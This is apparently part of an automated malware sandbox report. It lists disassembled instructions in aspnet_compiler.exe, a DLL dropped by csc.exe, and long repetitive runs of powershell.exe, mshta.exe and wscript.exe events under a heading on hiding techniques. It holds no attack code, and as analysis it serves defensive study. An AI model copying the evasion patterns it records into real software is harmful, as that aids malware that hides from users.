                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401DA6 push ebp; iretd 12_2_00401DB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00416EAA push esp; retf 12_2_00416EAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401F0D push eax; retf 12_2_00401F19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401FEB push edx; retf 12_2_00401FEC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00410FEE push ebp; iretd 12_2_00411000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00410FF3 push ebp; iretd 12_2_00411000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401FA4 push edx; ret 12_2_00401FAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401FBA push 0000006Ah; iretd 12_2_00401FC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E09AD push ecx; mov dword ptr [esp], ecx12_2_019E09B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
